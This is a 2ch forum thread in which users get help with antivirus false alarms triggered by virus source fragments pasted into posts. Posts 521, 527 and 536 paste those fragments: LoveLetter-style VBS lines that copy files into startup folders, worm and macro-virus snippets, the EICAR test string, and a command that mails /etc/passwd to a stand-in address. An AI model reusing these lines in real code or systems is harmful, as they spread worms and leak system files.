[表示 : 全て 最新50 1-99 101- 201- 301- 401- 501- 601- 701- 2chのread.cgiへ]
Update time : 12/10 22:53 / Filesize : 258 KB / Number-of Response : 783
[このスレッドの書き込みを削除する]
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧] [類似スレッド一覧]

↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

ノートンがvbsウィルスのソースに誤反応3

1 名前:他のアンチウィルスソフトが反応する場合もあります mailto:sage [05/03/01 01:58:58 ID:???]
只今2chでvbsのウィルスのソースを貼りノートンなどのセキュリティツールを誤反応させるのが流行っています。
あまりにも質問スレなどで既出の(このvbsの)質問が多すぎるのでこのスレへURLを貼って誘導してください。
また新たなパターンのvbsが見つかったら一応このスレで報告願えると幸いです。

■この問題について■
2chのスレにvbsウィルスのソースを書き込むことによってブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたとノートン先生などが騒ぎます。(設定によっては反応しないこともありますが、全く問題ありません)
ご存知の通り、htmlを読んでもこのvbsのソースは実行されることは無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダにhtmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
これらのファイルは削除しても全く問題ありませんが、該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされてしまうので警告が出ます。

■まとめと対策■
2ちゃんねる見ていたらvbsウィルスが検出された!
info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq12
2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか?
info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq08
2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。

前スレ
ノートンがvbsウィルスのソースに誤反応
pc.2ch.net/test/read.cgi/sec/1025872269/
ノートンがvbsウィルスのソースに誤反応2
pc5.2ch.net/test/read.cgi/pcqa/1033948204/

テンプレ>>1-10あたり

477 名前:ひよこ名無しさん mailto:sage [2006/03/24(金) 13:08:04 ID:???]
>>476
ブルーギル

478 名前:ひよこ名無しさん mailto:sage [2006/03/24(金) 13:08:25 ID:???]
>>473
本当に「インターネットセキュリティではなくアンチウイルス」なら、これが
参考になるかも(自分は2年ほど前にノートンやめたので確認できないが)

qb5.2ch.net/test/read.cgi/operate/1142464918/781

479 名前:ひよこ名無しさん mailto:sage [2006/03/24(金) 13:10:03 ID:???]
>>477
(ノ∀`) アチャー

480 名前:名無しさん@お腹いぱーい。 mailto:sage [2006/03/24(金) 21:51:35 ID:???]
緊急的に変えてみました。
info.2ch.net/wiki/pukiwiki.php?%CA%E4%C2%AD%A4%C8%CA%E4%B4%B0#Norton_Emergency_measures

他にNAVのワーム誤反応に関する対処方法が見つかりましたらお知らせください。

481 名前:ひよこ名無しさん [2006/03/24(金) 23:32:32 ID:5GkwjhYT]
>>480の誤反応スクリプトやろうと思ったけど、オートプロテクトを無効にしても攻撃を遮断するんだよね。
だからできなかった。まあIEで読めるからいいんだけどね。

482 名前:ひよこ名無しさん [2006/03/25(土) 00:28:09 ID:yFt5KPiX]
カサマツさん

483 名前:ひよこ名無しさん mailto:sage [2006/03/25(土) 10:37:30 ID:???]
ぼるぷー ◆sTCCYJJ/Lo の 自作自演
pc.2ch.net/test/read.cgi/win/1021112227/511-514

511 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
WIN2000を使っています。
一気にデスクトップを表示できるタスクバーにあったアイコン(ボードにペンのような印)が
なくなってしまいました。
スタート→設定→タスクバー〜を見ても、タスクバー上で右クリックをしても
復活させ方が分かりません。
また左下にデスクトップへショートカット(?)出来るあのアイコンを出すにはどうしたら良いでしょう。


512 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
>>511
[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop

これを デスクトップの表示.scf として保存、
クイック起動バーにD&D。


513 名前:名無し~3.EXE 投稿日:02/05/19 13:17
>>511-512
自作自演失敗?


514 名前:名無し~3.EXE 投稿日:02/05/19 13:19
でもなんで自演なんてするの?

484 名前:ひよこ名無しさん [2006/03/25(土) 15:16:53 ID:yFt5KPiX]
誰か答えてくれ。

485 名前:Today+ 210-194-140-30.rev.home.ne.jp+Dinner mailto:sage [2006/03/25(土) 15:28:44 ID:???]
あれ?



486 名前:ひよこ名無しさん mailto:sage [2006/03/25(土) 21:06:36 ID:???]
◆OCHZHO05EY の 自作自演
pc.2ch.net/test/read.cgi/win/1021112227/511-514

511 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
WIN2000を使っています。
一気にデスクトップを表示できるタスクバーにあったアイコン(ボードにペンのような印)が
なくなってしまいました。
スタート→設定→タスクバー〜を見ても、タスクバー上で右クリックをしても
復活させ方が分かりません。
また左下にデスクトップへショートカット(?)出来るあのアイコンを出すにはどうしたら良いでしょう。


512 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
>>511
[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop

これを デスクトップの表示.scf として保存、
クイック起動バーにD&D。


513 名前:名無し~3.EXE 投稿日:02/05/19 13:17
>>511-512
自作自演失敗?


514 名前:名無し~3.EXE 投稿日:02/05/19 13:19
でもなんで自演なんてするの?

487 名前:ひよこ名無しさん mailto:sage [2006/03/26(日) 00:25:22 ID:???]
>>480
こういうサイトって新鯖に変わるごとに新しい鯖のアドレス追加してるのですか?
それとも、それは手動で追加しないと駄目なのですか?

488 名前:ひよこ名無しさん mailto:sage [2006/03/26(日) 01:50:45 ID:???]
>>487
手動で追加してください。

489 名前:ひよこ名無しさん mailto:sage [2006/03/26(日) 10:00:20 ID:???]
>>487
手動ですね ある意味DNS鯖と逆を行く作業な訳ですから

490 名前:ひよこ名無しさん [2006/03/26(日) 13:41:53 ID:L69KVZ4+]
>>1を読んだんですが、
ログ保存フォルダを手動スキャンから除外するのは何故なんでしょうか?

491 名前:ひよこ名無しさん [2006/03/26(日) 13:42:57 ID:We2xmHRt]

スーパー競馬のモバイル投票(通信費以外無料)で
【宮記念】みんなでウインクリューガーを1番人気にしよう!
ex14.2ch.net/test/read.cgi/keiba/1143011764

モバイル

mob.cx-keiba.jp

PC

sports.nifty.com/superkeiba/

フジテレビ15:00〜から始まるスーパー競馬で
みんなウインガー(本来はありえない人気薄の馬w)に投票して
若槻千夏と福原アナのリアクション見ようぜwww
頼むおまいら!!フジVSvip、vipperの力を見せてくれ!!!!!
                  ) ∩∩ (
  ┏┓  ┏━━┓      .)  |.巾|  (     .┏┓┏┓┏┓┏┓
┏┛┗┓┃ ■ ┃┏━━━━ ノ人ヽ ━━━━┓┃┃┃┃┃┃┃┃
┣-  -┫┃┏┓┃┗━━━//━\\━━━┛┃┃┃┃┃┃┃┃
┗┓┏┛┗┛┃┃   Λ_Λ/  ∩∩ \ Λ_Λ   ┣┫┣┫┣┫┣┫
  ┗┛     ┗┛  ( ´∀)   |.┃|   (∀` ) .┗┛┗┛┗┛┗┛
             / ⌒\  ノ 人ニニニニニ⌒\
            /  /\ Y /        \   \
           ノ  / __ ̄_______   ヽ   ヽ  ノ⌒、
     ノ^ヽ  ((  / |||┌─────┐ J |   |  入 Y⌒/\)
     |_/ \`Y / ||| |ヽ(゚∀゚)ノ   .| ◎ | / | / \/
  //   /\/  .||| | (  ) ヽ(゚∀゚).|   .| ─ し/\)  \\
///  / /     ||| | < < (゚∀゚)ノ  | |||||| | \       \ \\
               スーパー競馬


492 名前:ひよこ名無しさん mailto:sage [2006/03/26(日) 14:18:37 ID:???]
>>490
誤反応させないようにするためじゃないの?

493 名前:ひよこ名無しさん mailto:sage [2006/03/26(日) 14:20:11 ID:???]
>>490
本当に>>1を読んだなら理解できるはず。
簡単にまとめると、ノートンはウィルスとして動作しないものまでウィルスと判定する。
(部分的なパターン照合だけで判定するため)
ノートンのこの性質を悪用して、ノートンを反応させる文字列を2chに貼りまくるヴァカが大勢いる。
ノートン側も2ch側も対応する気はなく、ノートンユーザーが各自対策するしかない。

「手動スキャン」に限って言えば、自動で駆除/隔離しないようにして、いちいち
手動で対応してもよいなら敢えて除外しないという選択もあり。

494 名前:ひよこ名無しさん [2006/03/27(月) 01:29:18 ID:l0NeUula]
Avastですが191の方法でも駄目です。


私だけでもないようです

524 :名無しさん@お腹いっぱい。 :2005/06/11(土) 16:44:33
こんにちは。質問です。

2ちゃんを見てると時々ウイルスが発見されて
スレ自体が見られなくなるんですが、良い解決策があれば教えてください。

2ちゃんブラウザはギコナビ、アンチウイルスはavast!です。
発見されるウイルスはWin32:Mhtplo-26 [Trj]ってのです。

avastの設定の「例外」に
2ちゃんのlogファイルを入れてみたんですがそれでも駄目でした。

495 名前:ひよこ名無しさん mailto:sage [2006/03/27(月) 01:29:55 ID:???]
>>494
ウイルス持って逃げろ。



496 名前:ひよこ名無しさん [2006/03/27(月) 03:08:39 ID:l0NeUula]
意味がわかりません

497 名前:ひよこ名無しさん mailto:sage [2006/03/27(月) 07:11:47 ID:???]
最近PCが重い!

├ 1.PCを買い換える
│                              
│    [まちがい]                         
│      確実な方法ではありますが、お金がかかるのが難点です。
│      それよりも別の手段を探してみませんか?
│      ちょっとしたフリーウェアでなんとかなるかも?
│              ↑
│          ココがポイント!

└ 2.RegSeekerを使う

      [せいかい]

Regseeker
ttp://www.hoverdesk.net/freeware.htm
RegSeeker1.3Beta日本語ファイル
ttp://downloads.at.infoseek.co.jp/

498 名前:ひよこ名無しさん mailto:sage [2006/03/27(月) 15:04:09 ID:???]
漏れなくシステム破壊の特典あり!!!


499 名前:ひよこ名無しさん [2006/03/27(月) 15:18:31 ID:l0NeUula]
意味がわかりません

500 名前:ひよこ名無しさん mailto:sage [2006/03/27(月) 16:03:22 ID:???]
>>494
ここにavastユーザーはあまりこないので
誘導されたこととテンプレをよく読んで
より詳しい環境を添えて↓で聞いてください。
avast! Anti-Virus Part41
pc8.2ch.net/test/read.cgi/sec/1143369350/

501 名前:ひよこ名無しさん [2006/03/27(月) 22:43:15 ID:l0NeUula]
最初そちらに書き込もうと思ったのですが
質問できる雰囲気じゃないんです。

502 名前:ひよこ名無しさん mailto:sage [2006/03/28(火) 01:04:40 ID:???]
>>501
新スレに移行しましたね。
avast! Anti-Virus Part43
pc8.2ch.net/test/read.cgi/sec/1143473121/
>>500にもありますがテンプレをよく読んで誘導されたこととより詳しい環境を添えて聞いてください。

嵐があっても見てくださる人はいます。
チャットではないので即レスは期待しないでくださいね。

邪魔が入ってスルーされたと感じて再投稿する場合や再質問する場合は最初に質問したレス番を名前欄に入れてください。

参考に
一般的な質問の仕方
ansitu.xrea.jp/guidance/?methodofquestion

503 名前:ひよこ名無しさん [2006/03/28(火) 14:26:03 ID:YrT7DvdY]
502さんありがとう。
流れが相変わらず速いので機を見て質問することにします。
次回はNortonだけでなくAvastもスレのタイトルに加えてください。

504 名前:ひよこ名無しさん [2006/04/10(月) 20:39:28 ID:x24VBSPG]


505 名前:ひよこ名無しさん [2006/04/10(月) 21:13:51 ID:xObkN9pL]
Wscript.KakWormっていうウィルスを↓のスレを見るたびに感染します。
sakura01.bbspink.com/test/read.cgi/ascii/1135064245/l50
(´・ω・`)ボスケテ
ノートンさんが反応します。






506 名前:ひよこ名無しさん mailto:sage [2006/04/10(月) 21:16:42 ID:???]
>>505
キンタマです。

507 名前:ひよこ名無しさん mailto:sage [2006/04/10(月) 21:20:28 ID:???]
>506
誤反応ってことですか??


508 名前:ひよこ名無しさん mailto:sage [2006/04/10(月) 21:20:58 ID:???]
>>507
トロイです。

509 名前:ひよこ名無しさん mailto:sage [2006/04/10(月) 21:21:56 ID:???]
>>508
(´・ω・`)ショボン

510 名前:ひよこ名無しさん mailto:sage [2006/04/10(月) 21:23:26 ID:???]
検疫→削除で桶ですか??

511 名前:ひよこ名無しさん mailto:sage [2006/04/10(月) 21:25:47 ID:???]
683を除外(´・ω・`)

512 名前:ひよこ名無しさん mailto:sage [2006/04/10(月) 21:27:20 ID:???]
>>511
初心者なもので分かりませんorz683とは何ですか?

513 名前:sage [2006/04/10(月) 21:58:13 ID:EhjrOlSY]
テスト

514 名前:ひよこ名無しさん mailto:sage [2006/04/10(月) 21:58:27 ID:???]
>>512
キンタマです。

515 名前:ひよこ名無しさん mailto:sage [2006/04/10(月) 21:59:34 ID:???]
テスト



516 名前:SAGE [2006/04/10(月) 22:01:07 ID:EhjrOlSY]
テスト

517 名前:ひよこ名無しさん mailto:SAGE [2006/04/10(月) 22:02:04 ID:???]
テスト

518 名前:ひよこ名無しさん mailto:HAGE [2006/04/10(月) 22:03:53 ID:???]
テスト

519 名前:ひよこ名無しさん [2006/04/12(水) 21:37:07 ID:oU4WH0fi]
money4.2ch.net/test/read.cgi/pachij/1140536153/
ここのすれの>>457のところにウイルスコードがあってあるので、
ノートンを立ち上げて、オプション→オートプロテクト→除外→新規→フォルダー?アイコン→
ローカルディスク(C)→プログラムファイル→Live2ちゃん→log→money4.2ch.net→pachij→
1140536153と1140536153.idx→すべてOKで閉じ

をしたのに、相変わらず上のスレではノートンが反応します。
再度除外項目を見たのですがきちんと除外項目に入ってました。
何故反応するのでしょうか??

520 名前:ひよこ名無しさん [2006/04/12(水) 22:14:11 ID:oU4WH0fi]
age

521 名前:ひよこ名無しさん mailto:sage [2006/04/12(水) 22:35:04 ID:???]
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

522 名前:519 [2006/04/12(水) 22:53:09 ID:oU4WH0fi]
他で聞きます。

523 名前:ぴーこ名無しさん mailto:・・・ ascii/1143450751/551 sage [2006/04/13(木) 00:07:39 ID:???]
>>519,522
・・・
>>1
2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。

ログフォルダの場所等についてはお使いの2ちゃんねるブラウザの配布サイト・ヘルプ・スレ等で確認してください。

また、これとは別にワーム誤反応対策の設定もしてね。
info.2ch.net/wiki/pukiwiki.php?%CA%E4%C2%AD%A4%C8%CA%E4%B4%B0#Norton_Emergency_measures
2chNIS問題まとめページ
mickey.mirv.net/2chnis.html

524 名前:ひよこ名無しさん mailto:sage [2006/04/15(土) 16:37:44 ID:???]
一昨日くらいからスレが見れなくなった
もちろんログ除外はしてあるのに、ノートン切ると見れる
どうして?ちなみに専ブラはギコナビ

525 名前:ひよこ名無しさん mailto:sage [2006/04/15(土) 23:21:55 ID:???]
>>524
誤反応



526 名前:ひよこ名無しさん mailto:sage [2006/04/16(日) 09:18:27 ID:???]
>>524
ログ除外以外にもやる事がある
>>1から読め

527 名前:ひよこ名無しさん [2006/04/17(月) 20:53:52 ID:Se29R1qE]
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))   
ms-its:mhtml:file://c:\ 
kak.hta';ken=wd+'START
End Sub

<body onload=window()>


528 名前:ひよこ名無しさん [2006/04/24(月) 17:37:20 ID:2zoSjqC7]
にくちゃんねるでログ漁ってたら「ワーム検出で遮断」とかで結局目的のスレが見られないんだが諦めるしかないのかな。
htmlを拡張子の検出対象から外すのもアレだし、ワーム防止をオフにするのもあんまりよろしくなさそうなんだがね。

エロイ人でもエロくない人でも良いから詳しく知ってる人教えておくれ。

529 名前:ひよこ名無しさん mailto:sage [2006/04/24(月) 20:13:42 ID:???]
ふーん

530 名前:ひよこ名無しさん mailto:sage [2006/04/30(日) 18:51:48 ID:???]
>NIS2005の場合(多分NIS2006も同じ)

同じではない件に付いて

531 名前:ぴーこ名無しさん mailto:・・・ ascii/1143450751/551 sage [2006/05/01(月) 23:31:23 ID:???]
>>530
kwsk

532 名前:ぴーこ名無しさん mailto:sage [2006/05/01(月) 23:32:01 ID:???]
目欄が・・・orz...........

533 名前:ひよこ名無しさん [2006/05/04(木) 23:17:25 ID:Gcx9i+9f]
>>524と同じ症状です。
ここ1週間から出てる。

534 名前:ひよこ名無しさん [2006/05/13(土) 05:26:57 ID:w+9rO7hg]
        , -'"´  ̄`丶、_
           ,.∩         `ヽ
         〃∪'´ ̄`二二人\  ヽ
         | ツ´ ̄ ̄ ̄ ̄´ ヾ ヽ. ',
         |ハ ,ニ、   ,. - 、 | | | l |
         | ハ ィハ     ,二ヽ. | | | | | 同じ板にコピペするとそのままだけど、
         | | | じ'   |トJ〉  /)} l | 違う板にコピペすると鬼のような怖い顔
         | ハ  、'_,   ̄,, 厶イ川| に変わる摩訶不思議な佳子様コピペ。
         l l /\    .. イV\川 |
         ,' l l ,イ `l ̄´ /   /ヽl l
         l | l ハ  `メ、    〃  ヽヽ、__ノ
         l  ∨ └‐イ「ト--ァ'´     ハヽ__ノ
         ヽ/  }  l」」 /     / }`ー
          〈_n| 八   / /     /ノ
          〈二二人 c /\/ / , イ
           /  /厂 /\__>< {_


535 名前:ひよこ名無しさん mailto:sage [2006/05/13(土) 09:57:56 ID:???]
        , -'"´  ̄`丶、_
           ,.∩         `ヽ
         〃∪'´ ̄`二二人\  ヽ
         | ツ´ ̄ ̄ ̄ ̄´ ヾ ヽ. ',
         |ハ ,ニ、   ,. - 、 | | | l |
         | ハ ィハ     ,二ヽ. | | | | | 同じ板にコピペするとそのままだけど、
         | | | じ'   |トJ〉  /)} l | 違う板にコピペすると鬼のような怖い顔
         | ハ  、'_,   ̄,, 厶イ川| に変わる摩訶不思議な佳子様コピペ。
         l l /\    .. イV\川 |
         ,' l l ,イ `l ̄´ /   /ヽl l
         l | l ハ  `メ、    〃  ヽヽ、__ノ
         l  ∨ └‐イ「ト--ァ'´     ハヽ__ノ
         ヽ/  }  l」」 /     / }`ー
          〈_n| 八   / /     /ノ
          〈二二人 c /\/ / , イ
           /  /厂 /\__>< {_



536 名前:ひよこ名無しさん mailto:sage [2006/05/15(月) 14:24:13 ID:???]
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

537 名前:ひよこ名無しさん mailto:age [2006/05/19(金) 20:06:44 ID:???]
保守age

538 名前:ひよこ名無しさん [2006/05/24(水) 01:38:47 ID:uOt5d8a9]
Live2ch使ってます
NAV2003のAutoと手動の各除外にLive2chのログフォルダを指定してますが
このスレを表示すると、「VBS.LoveLetter.Var」の表示が出ます。
もちろんスレは見れない状態です。
どうすれば回避できますか?

539 名前:ひよこ名無しさん mailto:sage [2006/05/24(水) 01:40:06 ID:???]



        ___
       /     \     ________
      /   ´`    \  /
     |   ・ ・     | <おい糞元祖ぶる殿 ◆U/gDqFZzsY.急ぎでラーク買うて来い
     |   (● ●)  |  \________
     \   ⊂ニ⊃ ノ
       \  ⊂ニ⊃
          ̄ ̄ ̄







540 名前:ぴーこ名無しさん mailto:sage [2006/05/24(水) 02:15:51 ID:???]
>>538
pc7.2ch.net/test/read.cgi/software/1144772862/12
ログフォルダの指定を今一度確認してください。

以下の方法でウイルスの検出された場所がわかります。
検出先が2ちゃんねるブラウザのログフォルダに含まれていることを確認してね。
service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/11ea5eb60c47e5c085256c470046ed2f/3a0dc97983b6908649256cee002d4b3b?OpenDocument
Norton AntiVirus を起動し、[レポート] を選択する。
「活動ログ」 の右側に表示されているボタン、[レポートの表示] をクリックする。

541 名前:538 mailto:sage [2006/05/24(水) 02:24:00 ID:???]
>>540
グミクズがさっさと教えろや

542 名前:538 [2006/05/24(水) 03:34:43 ID:uOt5d8a9]
>>540
レスありがとうございます。
ログフォルダの指定は合っていました。
ウィルスの検出場所は、Live2ch\temp.htm、という所です。
このHTMLファイルをNAVの除外に設定すればいいんですかね?
それとも止めといたほうがいいですか?(このファイルを削除しても意味無しですよね)
よろしければレスお願いします。
>>541
ID隠して騙りは止めてね

543 名前:538 [2006/05/24(水) 03:39:57 ID:uOt5d8a9]
>>540
言い忘れました、ちなみに
Live2ch\temp.htmはログフォルダの外にあるファイルです。

544 名前:ぴーこ名無しさん mailto:sage [2006/05/24(水) 04:07:14 ID:???]
>>542-543
こちらでも確認しました。
Live2chのスレビューはdatをtemp.htmに通して表示するので反応しているようです。
temp.htmを除外に加えたら正常に表示されました。

注意点はウイルスコードをhtmlに埋め込むことになるのでtemp.htmをIEなどのwebブラウザでは開かないでください。
また、2ちゃんねるブラウザの脆弱性を突いたウイルスコードも出る可能性もありますのでノートン本スレや
お使いの2ちゃんねるブラウザのスレを見るようにしてください。

545 名前:ぴーこ名無しさん mailto:sage [2006/05/24(水) 04:18:41 ID:???]
>>544追記
Live2chのfaqが過去ログにありました。>>84 orz.......

参考に
pc7.2ch.net/test/read.cgi/software/1141544659/484-n dat落ち
ttp://220.254.5.211:8000/2ch/pc7_software/1141/1141544659.html#484 ミラー



546 名前:538 [2006/05/24(水) 04:40:48 ID:uOt5d8a9]
>>545
わざわざ再現までしていただき(しかもこんな夜中に)すみません。。。
temp.htmを除外に加えたら、無事このスレもLive2chで見る事が出来ました。
ありがとうございます!
しかも、過去ログまで探してくれたんですね、、、ありがとうございます。

547 名前:ひよこ名無しさん mailto:sage [2006/05/24(水) 04:47:04 ID:???]
>>546
俺も暇だからよー

548 名前:ひよこ名無しさん mailto:sage [2006/05/24(水) 13:46:43 ID:???]
>>546
俺も暇だからよー

549 名前:cen ◆Am9xOgNMYE mailto:sage [2006/05/30(火) 02:32:01 ID:??? BE:137160162- ]
こんばんは。
>>17のソフトですが、対応するスクリプトを増やしました。
それから、検索の途中で中止できるようにしました。

550 名前:cen ◆Am9xOgNMYE mailto:sage [2006/05/30(火) 02:32:51 ID:??? BE:114300252- ]
忘れてました。
こちらです。
www.geocities.jp/cen_hp/index.html

551 名前:ひよこ名無しさん mailto:sage [2006/05/31(水) 22:57:19 ID:???]
bbs.cgiが更新されて>>4のような置換がちゃんと行われるようになった模様です
今後はウィルスコード貼っても反応しなくなるのかな

552 名前:ひよこ名無しさん mailto:sage [2006/06/01(木) 00:54:09 ID:???]
ダメですた
news18.2ch.net/test/read.cgi/mnewsplus/1149087966/66
>>4は完全に嘘であることが判明したので
次スレから削除かな
削除するだけだと「親切にも」追記する人が現れかねないから
別のテンプレに差し替えた方がいいかな

553 名前:cen ◆Am9xOgNMYE mailto:sage [2006/06/01(木) 01:06:54 ID:???]
>>552
>>4の置換で反応しないものもありますが、反応するものも
あります。完全に嘘というわけではないです。

554 名前:ひよこ名無しさん mailto:sage [2006/06/01(木) 01:23:16 ID:???]
どっちにしろ置換するようになったんだから>>4は大幅書き換えが必要

555 名前:cen ◆Am9xOgNMYE mailto:sage [2006/06/02(金) 01:25:51 ID:???]
こんばんは。
>>17のソフトですが、フォルダの設定によって検索できない場合
がありましたので、修正しました。
www.geocities.jp/cen_hp/index.html



556 名前:ぴーこ名無しさん mailto:sage [2006/06/02(金) 02:28:30 ID:???]
>>4のテンプレ案です。
単純に文字参照を抜いてみました。




ノートンが反応するのは、ここの掲示板(2ちゃんねる)の仕様です。
ここは、時に他のウィルス対策ソフトが反応する場合もあります。

断言できることは、他のWebページでノートンが反応した場合は要注意ということ。


尚、ここはウイルス鑑定スレではありません。
危ないと思ったURLはラウンジ板等の”勇気が無くて見られない画像解説スレ”で診てもらいましょう。
find.2ch.net/?STR=%CD%A6%B5%A4%A4%AC%CC%B5%A4%AF%A4%C6+%B2%F2%C0%E2%A5%B9%A5%EC&COUNT=50&TYPE=TITLE&BBS=ALL


■関連
ノートントラップ
ansitu.xrea.jp/guidance/?Trap#NortonTrap
ノートンインターネットセキュリティ@2ちゃんねる検索
find.2ch.net/?STR=%A5%CE%A1%BC%A5%C8%A5%F3+%8E%B2%8E%DD%8E%C0%8E%B0%8E%C8%8E%AF%8E%C4%8E%BE%8E%B7%8E%AD%8E%D8%8E%C3%8E%A8+board%3A%A5%BB%A5%AD%A5%E5%A5%EA%A5%C6%A5%A3&COUNT=50&TYPE=TITLE&BBS=ALL

557 名前:ひよこ名無しさん mailto:sage [2006/06/02(金) 04:54:27 ID:???]
>>556
Q. 2chが文字を置換しないのが悪いって聞いたんだけど
A. 情報が古いと思われます。2006年6月から置換するようになりましたが、
 問題の文字を使わなくてもノートンが誤検出する文字列は作れるので
 相変わらず反応する場合があります。

↑とか追加した方がいい。単に消すと
> 「親切にも」追記する人が現れかねないから
を防げない。

558 名前:ぴーこ名無しさん mailto:sage [2006/06/03(土) 22:00:18 ID:???]
Q. 2ちゃんねるが文字を置換しないのが悪いって聞いたんだけど
A. 2006年6月から置換するようになりましたが、
  ノートンが誤検出する置換できないウィルスコードがあるので反応します。

  ノートンがウイルスソースに誤反応の補足
  ansitu.xrea.jp/guidance/?supplement#o0c3cb41

ノートンが反応するのは、ここの掲示板(2ちゃんねる)の仕様です。
ここは、時に他のウィルス対策ソフトが反応する場合もあります。

断言できることは、他のWebページでノートンが反応した場合は要注意ということ。


尚、ここはウイルス鑑定スレではありません。
危ないと思ったURLはラウンジ板等の”勇気が無くて見られない画像解説スレ”で診てもらいましょう。
find.2ch.net/?STR=%CD%A6%B5%A4%A4%AC%CC%B5%A4%AF%A4%C6+%B2%F2%C0%E2%A5%B9%A5%EC&COUNT=50&TYPE=TITLE&BBS=ALL


■関連
ノートントラップ
ansitu.xrea.jp/guidance/?Trap#NortonTrap
ノートンインターネットセキュリティ@2ちゃんねる検索
find.2ch.net/?STR=%A5%CE%A1%BC%A5%C8%A5%F3+%8E%B2%8E%DD%8E%C0%8E%B0%8E%C8%8E%AF%8E%C4%8E%BE%8E%B7%8E%AD%8E%D8%8E%C3%8E%A8+board%3A%A5%BB%A5%AD%A5%E5%A5%EA%A5%C6%A5%A3&COUNT=50&TYPE=TITLE&BBS=ALL


>>557
ノシシ
以前の説明をwikiに誘導する形にしてみました。

559 名前:ひよこ名無しさん mailto:sage [2006/06/04(日) 10:03:06 ID:???]
u

560 名前:ひよこ名無しさん mailto:age [2006/06/04(日) 10:27:58 ID:???]
保守

561 名前:ひよこ名無しさん mailto:sage [2006/06/05(月) 19:23:06 ID:???]
jane doe view使ってるんですが、
ノートントラップのウィルスコード貼られたスレ取得障害になったり、
ここのPC初心者板なんかはノートン切らないと来れません。
それで対策として書かれてる見て、
ノートンアンチウィルスの手動&オートの除外項目から、
viewのLogsフォルダを両方除外したんですが、
